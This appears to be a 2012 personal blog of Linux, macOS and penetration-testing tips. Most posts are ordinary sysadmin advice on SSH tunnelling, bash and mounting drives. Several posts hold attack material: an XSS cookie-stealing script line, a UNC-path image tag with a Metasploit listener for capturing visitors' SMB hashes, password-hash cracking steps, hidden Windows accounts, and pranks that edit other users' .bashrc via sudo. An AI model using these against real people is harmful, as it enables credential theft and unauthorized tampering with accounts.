Wednesday, December 26, 2012

Default Oracle Usernames and Passwords

Metasploit keyscan_start Considerations


Here is a lesson that I learned the hard way. When you use keyscan_start and keyscan_dump, all those keystrokes are stored in RAM  on the target machine- NOT on the hard drive. I suspected as much, and upon further reading its confirmed here:

Normally this would be awesome for forensic reasons, but god damnit, if the person restarts the machine i lost everything. I'm going to start working on a keylogger that continuously sends keystrokes over the wire, just like the javascript keylogger currently does.

I find it incredibly dumb that the only way to retrieve those keystrokes is to manually run keyscan_dump when you feel like investigating the contents. That's not very modular, nor is it easy to build upon. This is me just being a little baby, but seriously, if we're going to make something lets make it awesome...

Thursday, December 20, 2012


Lots of times when i'm on a pentest the status messages i get from trying to auth to an smb server with certain creds are the same. But sometimes i lolwtf? at them. Thats where this handy little page comes in....handy

Thursday, November 29, 2012

SSH File Permissions

If your permissions on your SSH files are out of whack (i.e. id_rsa/config) than ssh will simply ignore using them out of security concerns. To fix permission issues you can run the following:

chmod 750 $HOME
chmod -R 700 $HOME/.ssh

This creates the strictest permissions for all the files under .ssh which will satisfy SSH's requirements for those files. SSH's recommendations and requirements (underlined) are below (from the manpage):

  • ~/.ssh/id_rsa (OR ANY PRIV KEY) - These files contain sensitive data and should be readable by the user but not accessible by others (read/write/execute).  ssh will simply ignore a private key file if it is accessible by others.
  • ~/.ssh/config - Because of the potential for abuse, this file must have strict permissions: read/write for the user, and not accessible by others.
  • ~/.ssh/authorized_keys - This file is not highly sensitive, but the recommended permissions are read/write for the user, and not accessible by others.
  • ~/.ssh/ - There is no general requirement to keep the entire contents of this directory secret, but the recommended permissions are read/write/execute for the user, and not accessible by others.
  • ~/.rhosts - Additionally, this file must be owned by the user, and must not have write permissions for anyone else.  The recommended permission for most machines is read/write for the user, and not acces- sible by others.
  • ~/.shosts - Same as rhosts
  • ~/.ssh/ (OR ANY PUB KEY) - These files are not sensitive and can (but need not) be readable by anyone.
  • /etc/hosts.equivIt should only be writable by root
  • /etc/shosts.equiv - same as above
  • /etc/ssh/ssh_known_hosts - It should be world-readable

Bash Special/Reserved/Internal Variables

Bash can do a WHOLE LOT MORE than most people think. This is because there are a lot of bash features that people dont know about. Take it's special reserved variables for instance:

You can make your bash scripts do some pretty complex stuff using some of those variables.

Reserved variables are also another reason its suggested NOT to have your variables be all in UPPERCASE, because you never know what you might accidentally use.

for instance:

cat -n file.txt | grep $LINENO #Wont work as expected
cat -n file.txt | grep $lineno #will work as expected

This is because $LINENO has a special meaning, it means the line number of current line its being called on.

so if the $LINENO variable is being called on line 15 of the script, it will ALWAYS grep the 15th line of file.txt. $lineno is lower case, and therefore a completely different variable, which is defined by you.

Wednesday, November 28, 2012

SSH Failover

You can have SSH iterate through a list of servers until it finds the one that works.
for i in $(cat servers.txt); do
if ssh -o ConnectTimeout=10 $i; then
echo "$i is the one that works"
The ConnectTimeout option specifies that if it cant make a connection in the specified time, than it stops trying, and moves on to the next iteration. Otherwise you can wait the default of 45 seconds.

My suggestion is to have servers.txt file actually be the host entries in ~/.ssh/config :

Otherwise, just type out:

Simpler SSH Tricks

So last time i said that basically you had to create a bunch of reverse port forwards to get that whole odd tunnel system to work. Well, you actually dont.

C still has to have a reverse tunnel to B, but on A all you have to do is create a local port forward. So, on A:
ssh -L $local_listen_port:localhost:$remote_listen_port $user@$B

now just:
 ssh -D localhost:$local_socks_port $user@localhost -p$local_listen_port 

Saturday, November 24, 2012

Stupid SSH Tricks - Securely jumping NATs

I have 3 machines - A,B,C.
A and C are two residential networks that are behind typical NAT routers.
B is a VPS on the internet.

My problem is that I'm at a friend's house, and i need to check my torrent downloads via a webserver on my home's internal network. How can i do this without actually exposing any listening ports to the internet?

So, basically I want to connect from A to C in order to browse several servers in C's network.

This is how to do it without opening any publicly listening ports. (the easy way is just to have C listen on a B's public interface, but that raises security concerns)

1. Have C create a remote port forward to a port on B's localhost
i.e (from C's terminal)
 ssh -R 6000:localhost:22 user@vps 

2. Have A create a remote port forward to a port on B's localhost
i.e (from A's terminal)

 ssh -R 6001:localhost:22 user@vps 

3. Have B create a remote port forward between A and C via the local ports
i.e (from B's terminal)
 ssh -R 6002:localhost:6000 localhost -p6001 

4. Have A setup a socks connection to the new local port listening on A
i.e (from A's terminal)
 ssh -D localhost:8080 localhost -p6002 

5. Point A's browser to use localhost:8080 as a socks proxy. This now will tunnel all the requests from that browser over the ssh tunnels to C's internal network.

My suggestion, is that you keep C always connected to B. This allows you to set up all the tunnels with one long command from A's terminal:

 ssh -R 6001:localhost:22 user@vps -t ssh -R 6002:localhost:6000 localhost -p6001 -t ssh -D localhost:8080 localhost -p6002

Its important to note that you dont TECHNICALLY need to do that many reverse tunnels. 1 reverse tunnel from C to B, and then a local forward from A to B is really all thats needed. But, to each his own...

Friday, November 23, 2012

netstat -ntlup for OSX - Viewing open network connections

netstat -ntlup is a command i run often in linux to give me a quick run down of what is listening on what port. Unfortunately if you try to do that in OSX is pukes, and cries, and wants its mommy.
Enter lsof - one of the big boy binaries on the lot.
The following command will list all established and listening sockets open on your machine, sorted, along with the process name, the state, the source, and the destination. Needless to say, I like this command:

lsof -i | grep -E "(UDP|LISTEN|ESTABLISHED)" | awk '{print $10, $1, $8, $9}' | column -t | sort

Monday, November 19, 2012

Download DerbyCon 2012 Videos

DerbyCon videos are hosted for free at I simply made it easier to download all of them. I suggest copying all of these into a file eg. day1, and grabbing them using "wget -i day1". that way you can walk away and come back a while later to watch them.

DAY 1:



OSX Trash Bin Wont Empty

They mountain lion update for me has made my mac much worse. One of the issues i've found is that the trash bin wont finish emptying for some ungodly reason. It will just sit there, saying it has to delete like 2000 items and it will just never finish. Well, luckily there is an easy way to do it manually.

A user's trash bin is stored in their home directory, under "~/.Trash". All you have to do is go into that directory and just 'rm -rf' everything there. Or if you are paranoid about the hard drive sectors, you can always do a 'rm -rfP' which will overwrite the files 3 times before releasing the sections as free.


rm -rfP ~/.Trash/*

Monday, November 12, 2012

Capturing SMB hashes over the internet

I like leaving this enabled on my VPS just for fun sometimes. You can capture people's SMB hashes remotely using a UNC path to reference resources. So when your browser loads my page, it sees the resource that it thinks exists on some SMB server somewhere, and IE will automatically throw its credentials at it. IE does this for a "seamless user experience". Well, luckily that means for us a "seamless user pwn".
So on your VPS, modify index.html at the root of your web server to include this:
<img src="\\\cats.gif" />
and then run as root:
msfcli auxiliary/server/capture/smb JOHNPWFILE='/root/testsmbcapturefile' E

Friday, November 9, 2012

Disabling upstart jobs

Have you used rcconf/chkconfig to disable services from booting up? have you even checked the correct rc directory to see if it starts with a "K" vs a "S" and services are still booting up? You should probably check if the service/daemon was converted to an upstart job.

System upstart jobs are found in /etc/init/

the simplest way to disable the service from starting is to rename it. So, for example the service "smbd" would be stopped from starting like this:

mv /etc/init/smbd.conf /etc/init/smbd.conf.disabled

This way, you can keep the original configuration file and it will be plainly noticed that its "disabled"

Thursday, November 1, 2012

Show who ran that sudo command

When you have a server used by many people its often understood that you should be considerate when running certain programs or if you plan on utilizing lots of CPU. Sometimes that consideration flys out the window. When that happens i like to track down who the douchebag is. Here are some ways you can find out the person.

pstree -aUhu
run that command and you will see a pretty tree being drawn to your terminal. reading through the output will show you the commands, their arguments, what process is the parent, and if the user changed. This command has yet to fail me in determining process ownership.

grab the PID of the process that is in question using either 'pidof' or just copying it out of 'ps aux'. Once you have the PID, cat the file above (while replacing "PID" with the copied PID) and it will output the enherited environment variables of the process, which includes the "SUDO_USER=jim" variable.

Tuesday, October 23, 2012

Nmap & suid

If you come across a machine or web app that has nmap with the suid bit set, then the following article will be of interest to you:

Friday, October 19, 2012

Mount NTFS ISOs in linux

watch ALL the things

So i'm waiting for a drive to clone and i like to see both the byte size AND the human readable byte size. I know you watch repeating command using "watch" dur...but two commands at once?

Its actually much simpler than it sounds. All watch does is pass the arguments to 'sh -c'. So, it follows that the following line must work:

watch ls -l file \; ls -lh file

and yes, it does. All you need to do is escape the command terminator ';' so it will be passed as an argument.

now to watch paint dry...

Wednesday, October 17, 2012

OSX Alert Boxes

Found this on a stackoverflow post, apparently running the following line pops up a box with the specified text:
osascript -e 'tell app "System Events" to display dialog "ZOMGLULZ"'

Monday, October 8, 2012

Actual XSS Impact

Popping up alert boxes as a PoC for XSS is cute and all, but sometimes you want to see the actual attack. The following javascript line will make a GET request to and append the document.cookie to the request. You then log into that server, read your apache logs, and you have the cookies for that user. Replace your browser's cookies with the captured ones and, depending on the site, you could log in as them.
<script>a = new Image(); a.src = "" + document.cookie + "end"; </script>
This is an actual attackers line, dont be stupid.

Generate NTLM hashes via command line

Turns out the NTLM hashing algo is super simple. It just takes the string you give it, converts it to UTF-16LE and then outputs the md4 of that. You can generate your own fairly simply at the command line:

iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4
What this does is use a fairly popular unix utility "iconv". -f is the "from" encoding, which is this case is just simple ASCII and sets to "to" encoding using -t. It reads in the string using printf and pipes that to openssl for the digest. the result is the NT hash of the string (or password if you want to look at it like that) "lolwut"

$iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4
create a function and place it in .bashrc:
ntlm_hash () {
iconv -f ASCII -t UTF-16LE <(printf "$1") | openssl dgst -md4
now just type "ntlm_hash lolwut" to get the same result.

Stealth cURL

I use curl all the time, almost every day. Unfortunately curl thinks its a good idea to use their own user agent string when grabbing content from sites. This has the problem because sometimes devs code in exceptions for different browsers, so the page you get back for internet explorer is different than the one you get for firefox. Luckily, the curl devs included the ability to change your user agent string to whatever you want.

normally curl's agent string is this: (curl from my macbook)
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5

That is grabbed directly from the header that is sent to the server (captured using netcat). As you can see its fairly obvious that the person is on mac and they are using curl. To change this user agent agent so it appears as if firefox is grabbing it, we use the -A option. First we grab the valid user agent string we decide to use from In this case i'm going to use the latest firefox one, the command line is as follows:

curl -A 'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2'
Now if you look at your logs, you will see the user-agent string will reflect the new string.

curl supports config files using -K, so you can just place it in a file along with whatever else you want to use and reference the config files, a nice example is in the man page.

Wednesday, October 3, 2012

Regex for PHP serialized data

This is the regex string to use when searching through a document for serialized data.


I got it from here:

Tuesday, September 25, 2012

John The Ripper Formats

Friday, September 14, 2012

VIM commands in GUI text editor

I used textmate for quite a long time, but my biggest gripe was that i couldnt run VIM commands in it natively. Then my friend told me about MacVIM ( I've been enjoying it quite a bit ever since i downloaded it.

It allows me to run all the VIM commands i'm used to while still having the clickyness of a GUI.


Tuesday, August 14, 2012

Troll Tricks #2

"Let me log into the server to check my mail...ALRIGHT, WHO THE FUCK DID THAT?"
*Supressed childish giggle*

Who wouldn't want to be greeted by nyan cat when they log into their terminal? Its so cute and fluffy and pop-tarty. I think some people dont quite appreciate the grace and elegance of the whiskered space-poptart. Lets enhance their experience with the gift of NYAN.

sudo -s "echo telnet >> /home/user/.bashrc"

Now whenever they decided to join the server, they can join the fun!

*What this basically does is telnet straight to a server that NYAN's the crap out of them until they enter the telnet escape sequence 'ctrl+[' when they then type quit + enter, it drop them back to their shell.
**this is the nice way of doing it, you can always put in an "exit" right after so it doesnt drop them to shell.

Troll Tricks #1

"Hey steve, what services are running on our server"
"Let me see here, wait...what the fuck? we are running LOLCATS and LOLDONGS and ftp?"
* suppressed childish giggle*

In our first installment of troll tricks, I shall teach you how to modify the port descriptions in linux. Typically when you run a command like "netstat -tlp" or "ss", it will give you the actual name of the port that the number is associated with. 22=ssh, 23=telnet, 25=smtp, and so on. What a bunch of people dont realize is that you can change the text of the reported port, so that 22=LOLCATS, 23=LOLDONGS, and whatever else you'd like. The best part is the changes take place immediately and have no real impact on the server whatsoever.

The secret key to the whole troll is a certain file:

This is the file that holds all the corresponding associations. Simply run:
sudo vi /etc/services

and modify whatever entries you'd like. Now, the next time someone runs a command that interprets port number to port name, it will give the new port name.

It's just that simple. Change back when you are done and everything is back to normal.

Monday, August 13, 2012

Test Internet Bandwidth via command line

Got this from a stackoverflow article:

wget --output-document=/dev/null

Tuesday, August 7, 2012

How to bridge two linux interfaces

Create the bridge table:
brctl addbr bridgename

then add the interfaces to the bridge
brctl addif eth1
brctl addif eth2

Wednesday, July 18, 2012

List entire directory paths for remote FTP directory

I use this all the time to quickly search for fancy filenames in FTP servers that allow for anonymous logins. It basically is a for loop to log into each server, run the find command which outputs absolute paths for directories and files, and outputs that to a file with a name as the IP.
for i in `cat ftp_anon_hosts`; do echo FTP LIST $i; lftp -e "find;QUIT" anonymous:anonymous@$i &gt; ftp/$i; done

Tuesday, July 17, 2012

Rainbow Tables for rcracki

Download links are all right here:

Thursday, July 12, 2012

Empty/null hashump (LM/NTLM)


is the LM/NTLM hash pair for blank passwords. You can create this pair by running

"net user kittens /add"

and it will result in:


This is an easy way to tell if the hash you have is actually a password or not.

Wednesday, June 27, 2012

Sublime 2 command line starter

Textmate simply needed you to type "mate file1" to open file1 in the textmate gui.

Sublime 2 doest have that. well thats stupid. so I made my own:

alias sublime='open -a "/Applications/Sublime Text"'

now just type "sublime file1" and it will start the file in the gui, just like textmate.

Updating metasploit in brew

Straight from brew when you first install metasploit:

Metasploit can be updated in-place by doing:
  cd `brew --prefix metasploit`/libexec/
  svn up

Monday, June 4, 2012

My tech/infosec subreddits

Bookmark this page for good times:

Awk from pattern to End Of File

awk '/regex/,EOF' file1

Thursday, May 31, 2012

From LM to NTLM passwords in John the Ripper

so you dump some passwords from a machine and you see it contains LM and NTLM hashes. obviously LM is quicker to crack so you go for that one first and it gives you the uppercase plaintext password:
./john --format=lm /root/hashes

which provides the plaintext uppercase password "KITTENBOOTIES". Great, now we need the real password, the one with upper/lower cases. we do this easily by supplying the "KITTENBOOTIES" password as the wordlist (with mangling) to john again. so do this:
echo KITTENBOOTIES > wordlist1
./john -rules --format=nt /root/hashes --wordlist=wordlist1
This will output the proper password of "kiTTenBooTiES"


Tuesday, May 29, 2012

shut bonjour up

Bonjour makes a lot of annoying noise from a mac when you are trying to do some traffic analysis. you can help that by disabling bonjour's multicasts with:
sudo defaults write /System/Library/LaunchDaemons/ ProgramArguments -array-add "-NoMulticastAdvertisements"

SANs guide to basics of securing datacenters and their location

Friday, May 18, 2012

Make your bash usage/movement faster and more efficient

Sudo doesnt work with "&&" and various other bash keywords

    Lets say I want to run apt update and upgrade one after another. Typically you do this with:

apt-get update && apt-get upgrade

    Unfortunately, oftentimes you need root permissions to do that. So a person will usually simply type:

sudo apt-get update && apt-get upgrade

    And if you hit enter, "apt-get update" will run successfully and "apt-get upgrade" will fail. This is do to the fact that when you hit enter, bash has to interpret the line you just submitted. And according to the rules of bash, your line was interpreted to mean three things. First run "sudo apt-get update" then if that returns an execution code of 0, then continue to "apt-get upgrade".
    What you want to do is send your WHOLE line to sudo for execution. You do this with the "-s" argument of sudo. so that:

sudo -s 'apt-get update && apt-get upgrade'

Of course my short way is usually simply typing "sudo !!" after i mess up the line, it works just fine.

Thursday, May 17, 2012

Learning to love the man

manpages are awesome. some people tend to think there are only manpages for programs, which is completely not true. take for example "man ascii" or "man hier" which display the ascii tables and an explanation of the purpose of each unix directory respectively. You can discover where the manpages on your system are located by executing 'manpath'. This will output a list of directories in a similar format to  "echo $PATH". Look through the directories to find the 7zipped files containing the manpage data.

I've gotten into the habit of opening each one just out of curiosity. Its actually kind of fun if you have nothing to do.

SSH Inception

I must go deeeeper -_-

I have a box on a network that is only accessible via connecting to multiple SSH boxes in succession. the "-t" option in ssh allows me to go straight through all the boxes using one line:

ssh -t ssh user@homeserver -t ssh user@home-desktop

You literally just chain together as many ssh connections as you'd like. They just pass the arguments on and on. If you alias that to something like:

et-phone-home="ssh -t ssh user@homeserver -t ssh user@home-desktop"

then you should be all set.

Thursday, May 10, 2012

Supplying a file to metasploit rhosts

Apparently lots of people dont know you can do this... I will often parse things like FTP hosts into a file and then supply that file as the value of the RHOSTS option in metasploit. This makes it much easier for me to supply a crap ton of hosts without actually typing much of anything.

msfcli auxiliary/scanner/ftp/anonymous RHOSTS=file://root/clients/clientname/nmap/ftphosts E

Apparently it only takes absolute paths unforuntaely, but if your using msfcli instead of msfconsole, why not use bash to your advantage?

msfcli auxiliary/scanner/ftp/anonymous RHOSTS=file://$(pwd)/ftphosts E

That line works great if you're 10 directories deep and are too lazy to type.

I noticed I didn't actually talk about msfconsole, in case it wasn't obvious you do "set rhosts file:/root/blah/ftp.hosts" or whatever your file is and it will take it.

Doesnt work if the module only takes on host though :(

Delete conflicts in known_hosts

Often times i will connect to an ssh server in one network and so some work. Later on, I will move somewhere else and connect to some other network and have to ssh in. Incidentily i'm ssh'ing into two different servers that happen to have the same IP (even though they are two completely different networks). I know whats going on here and i'm doing it all on purpose. Unfortunately ssh still likes to freak out that this IP now magically has a new public key. cool story bro, i already knew.

I got sick of every time this happened to have to go into known_hosts and delete that entry. ssh will always tell you the line number that contains the conflicting key, so all i have to do is delete that line from known_hosts and bam. i'm done.  So i came up with this little function to make my life easier:

ssh-del-line() {

    if [[ -z $1 ]]; then

        echo 'Deletes the specified linenumber from ~/.ssh/known_hosts'

        echo 'Usage: ssh-del-line linenumber'


        sed -i "/$1/d" ~/.ssh/known_hosts

    fi; }

Wednesday, May 9, 2012

A better way to expand hosts in a subnet

Before i mentioned that you could expand the hosts in a subnet by using bash brace expansion. While that works fine, if you have a file with 40 different CIDR subnets in them it can be REALLY annoying. In walks nmap.
Nmap has a scan feature called list scan that will output the IPs to be tested. All you need to do is supply it with a range/file-with-ranges and it will output the IPs, one in a line. The output may be a little ugly so i created a quick function to parse out just the IPs
expandrange() {
    if [[ -z $1 ]]; then
        echo 'Expands the subnets/ranges provided in the first argument to output in the second argument (file)'
        echo 'Usage: expandrange range.cidr.txt range.long.txt'
        nmap -sL -n -iL $1 | grep 'Nmap scan' | cut -d ' ' -f 5 > $2
    fi; }

Tuesday, May 8, 2012

Cisco VPN - Fix for Error 51: Unable to communicate with the VPN subsystem

sudo kextload /System/Library/Extensions/CiscoVPN.kext

CLI Twitter and Oauth

Since twitter no longer allows the "basic" authentication mechanism for posting tweets, it has moved over to a much more secure alternative: OpenAuth

Before it was as easy as creating a cURL line to post the contents to the twitter api. Things have gotten more complicated since then. I could describe everything, but someone else has already done a fine job of the walk-through:

Sunday, April 1, 2012

Your MD5 is wrong

This is an annoying display of ignorance on the part of many people at certain conferences. They will enter a contest and often times the answer must be submitted in the form of an md5 hash. So they will solve the puzzle and the secret key to give them points will be "kittens". They need the MD5 of the string "kittens" so they run the following:

echo 'kittens' | md5sum

They submit that hash to the scoring engine and it says INCORRECT, TRY AGAIN. "Well wtf...lets check our answer again". *1 minute later* "yeah its definitely right, their scoring engine must be broken or something"

I've heard that muttered all too often at contests and it makes me cringe. Here is what went wrong, and the scoring engine is working perfectly fine, you just dont understand how echo works. It helps if we look at things with our hexray vision.

echo 'kittens' | xxd -p

you see that? whats that last character? '0a' - if you look up what '0a' means in the ascii table (man ascii), you will see that it represents  the new line. echo, BY DEFAULT, appends a new line to whatever string you wrote. That folks, is what fucked up your hash.

echo -n 'kittens' | xxd -p

now the 0a is gone. now pipe your new echo command into md5sum and you have the correct hash the scoring engine was expecting.

you could avoid the whole issue if you used printf instead of echo. To visualize this:

printf kittens | md5sum
84169a8d5b3289e8ece00d7735081b53  -

echo kittens | md5sum
f261adc7c891836ecc58c62fb80c6e34  -

echo -n kittens | md5sum
84169a8d5b3289e8ece00d7735081b53  -

just an fyi: apparently bsdutils of 'md5' have a -s for string argument that does it all in one go:

md5 -s kittens
MD5 ("kittens") = 84169a8d5b3289e8ece00d7735081b53

Bad Passwords and Password Complexity

I've heard this time and time again: "We are ok, we require password complexity". lulz, are you serious? I'm not even going to get into how bad windows "password complexity" or the rest of their policies are. I'm just going to remind people of this one simple truth:

Password policies only apply on new passwords.

Which means, if you had accounts before you enabled the policies, you may still be at risk for accounts with password of password, or same as username, or other really retarded "it would never happen to me" passwords.

This is the exact reason why I STILL find weak passwords in environments where password complexity is on, minimum password length of like 20. jimbob's password is still jimbob, because he created that password before the policies were enacted.


Well you could set every person's password to require a change on next login. and then set the password change interval for every 30 days. But, thats not enough. Because you could force every user to reset their password on login, but if there are accounts not being actively used, they will simply ask the attacker to change their password.

What I would do is this:

1. Temporarily turn off the account lockout threshold on the domain.
2. get a list of every user on every domain
3. use metasploit or medusa to try a decently sized dictionary file against all the users
4. make a note of all the users with weak passwords and either disable that account or change the password yourself
5. reenable the lockout threshold to something reasonable, like 3 or 4
6. make sure password complexity is on
7. make sure minimum password length is on, I would make it 15 to kill all chances of LM hashes being stored.
8. disable LM hashes ery'where

You also want to make sure to write up a basic "dont be a idiot with your passwords" email to distribute. Make it humorous so that its memorable, this way when someone is breaking the policy, it will be funny to their coworkers to belittle them. Make the minions do your policing for you.

Some simple "Human Password Policies"
1. Never write down your password anywhere - thats what your brain is for
2. Never give out your password to anyone, you dont give you safe combination to anyone do you?
3. You no longer have a Pass-"word", you have a Pass-"phrase", make it a sentence, a lyric, something funny only you will remember.
4. Like your wife said, the longer the better.

Wednesday, March 21, 2012

How to mount a drive as another user

This was a case of one of those issues where you constantly search for an answer to only have it staring you in the face the whole time *facedesk*

if you want to mount a drive as another user or have its group as something else, simply place uid=xxxx and/or gid=xxxx in the mount options.

for example:
     mount -t vfat /dev/sdb1 /mnt/kittens
will mount with root permissions (BOOOOOOO)
     mount -t vfat /dev/sdb1 /mnt/kittens -o uid=1000,gid=1000
will mount as the user that is uid=10000 with group permissions of gid=1000

now my hacked appletv will properly read that mounted drive for all my media crap. sweetities.

Persistent SSH Tunnel

I always have a box reverse ssh to one of my other boxes. This tunnel needs to stay up at all times and it need to come back after restarts. This is the solution:

Firstly I need to know exactly what command I will use for the reverse connection. This is mine:
  • ssh -i /home/loldongs/.ssh/lin -N -T -R 4510:localhost:22
Great, now i need a "watcher" script that will constantly check if the connection is up; if so, do nothing; if not, start the damn thing.
#make sure a process is always running.

export DISPLAY=:0 #needed if you are running a simple gui app.

process='ssh -i /home/loldongs/.ssh/lin -N -T -R 4510:localhost:22'
makerun='ssh -i /home/loldongs/.ssh/lin -N -T -R 4510:localhost:22'

if ps ax | grep -v grep | grep "$process" > /dev/null
        $makerun &
I found this somewhere on the internet, i'm loving it. I mainly love it because all i have to do is call this script from cron every minute and i will ensure that the connection is never down for more than 60seconds.

Synchronizing torrent downloads

    I dual boot between win7 and ubuntu. The problem is when i log into one of those, typically i will sit in it for quite a long time. I'm also an impatient man so I dont want to only be able to download torrents while in only one or the other.
    I want to be able to download the same torrent whether im in linux, windows, or your mothers arse. I noticed that the majority of torrent clients will/can ask for 3 different folders.

  • A "completed" folder where the files will be moved upon full completed download
  • A "session" folder where the client stores files letting it know where the torrent is in the download
  • A "watch" folder that the client will constantly look at to integrate new torrents
I have many harddrives so I decided to allocate one of them to my torrent downloads where i can later organize into the different categories after download (read: bored).

This drive is mounted on my machine at /media/tdrive/
I created the following commands in that drive to hold all torrents and the such.

  1. mkdir /media/tdrive/torrents; cd !^
  2. mkdir torrents-watch
  3. mkdir torrents-completed
  4. mkdir torrents-session
Now that the folders are set up, you will have to configure your torrent clients to point to those directories. You can easily do so with .rtorrent.rc

# Default directory to save the downloaded torrents.
directory = /media/tdrive/torrents/torrents-completed

# Default session directory. Make sure you don't run multiple instance
# of rtorrent using the same session directory. Perhaps using a
# relative path?
session = /media/tdrive/torrents/torrents-session

# Watch a directory for new torrents, and stop those that have been
# deleted.
schedule = watch_directory,5,5,load_start=/media/tdrive/torrents/torrents-watch/*.torrent 

Now when I start rtorrent on linux, it will scan through the dirs and pick up the ones that still need to be downloaded. The same happens with utorrent in windows.


Dump Mac Ram Contents

My company installed AV and I saw it had a password with it. I wanted to know what that was so I decided to dump my RAM. Using this:

I was able to dump my contents to disk and open it in a hex editor to look for the portion that had the password. I found the password like i expected to, and i'm glad it isn't THAT awful a password like i feared.

Thursday, March 15, 2012

sudo: unable to resolve host loldongs

Apparently if you just change the hostname in /etc/hostname, sudo starts crying that it cant resolve the new hostname.

It looks like you can just add an entry in /etc/hosts for your new hostname to point to yourself ( and then it gracefully shuts the fuck up.


SSH2_MSG_KEXINIT and ssh connections dropping

For some reason ssh was just choking when i was trying to connect to my BT5 install. ssh -vv would result in the connection being reset. It turns out that the server didnt have the proper keys installed by default.

sshd-generate fixed the issue. everything worked afterwards

Bash trivia trick

If you want to feel smarter than someone else, try this little trick.

Challenge the other person to create a file on the filesystem by sending the shell only 3 characters.

Answer? super simple:


1: >
2: a
3: 'new-line'

now if you do an 'ls' you can see the empty file 'a' was created in the current directory. This is a short way to create an empty file on the local system. Basically what is happening is you are redirecting nothing into a file, since that file didn't exist previously, it created it. Hence, creating an empty file.

Now you can reserve 'touch' for more fancy trickery (timestomping)

Friday, March 9, 2012

Disable FireWire completely on Mac

using inception, its super easy to dump a Mac's ram through the DMA feature of FireWire. This includes plaintext login passwords. I tried it, i saw my password, i wept.

Next step? obliterate firewire.

First step, move the firewire kext folder to you home directory for a backup:

sudo mv /System/Library/Extensions/IOFireWireFamily.kext ~

then make a placeholder directory for kicks and fun

sudo mkdir /System/Library/Extensions/IOFireWireFamily.kext/

then boot the mac using a system disk to set an openfirmware password.

once you set the password, the attack kind of stops working.


Tuesday, February 21, 2012

Monday, January 30, 2012

Remove the Service fingerprint from nmap xml file

sed 's/servicefp=.*" //g' first-pn.xml > f.xml

simply matches the servicefp (including the tag itself) and replaces it with null, globally.
first-pn.xml is the source file, f.xml is the output

Monday, January 23, 2012

Hide users from net user

Cute, apparently you can hide users from the output of "net user" by appending a $ to the name. It still shows up if you look for it explicitly or if you go to control panel.

net user cats$ lolwutcats? /add

Tuesday, January 10, 2012

Homebrew and pianobar

PromyLOPh pushed a patch today to fix pianobar so it would be compatible with a recent protocol change. Apparently Pandora has changed from using TLS to not using TLS...Well thats all fine and great but I use homebrew for mac to maintain my packages. I wanted my pianobar updated NAOW. so i started looking around...

-First i ran "locate pianobar" to get an idea of where the files were located.
-"/usr/local/Library/Formula/pianobar.rb" caught my eye so i looked into it...
- The ruby file has a few entries in it, but towards the top is this code:
class Pianobar < Formula
url ''
version '2011.12.11'
homepage ''
md5 'c8573c133851ff54649d1ab45c7b855c'

-this obviously looks like where it tells homebrew to download and install the program. so what happens if I change those values to reflect the most current version?
-I opened the ruby file in vim and changed the settings:
class Pianobar < Formula
url ''
version '2012.01.10'
homepage ''
md5 'a703227c079cb0fe20ac4abbdfbc6f08'

-saved, and ran "brew upgrade pianobar"

==> Upgrading pianobar
==> Downloading
######################################################################## 100.0%
==> make PREFIX=/usr/local/Cellar/pianobar/2012.01.10
==> make install PREFIX=/usr/local/Cellar/pianobar/2012.01.10
/usr/local/Cellar/pianobar/2012.01.10: 16 files, 176K, built in 3 seconds

-awwww yeahhhhh now i have my crack back in my spoon.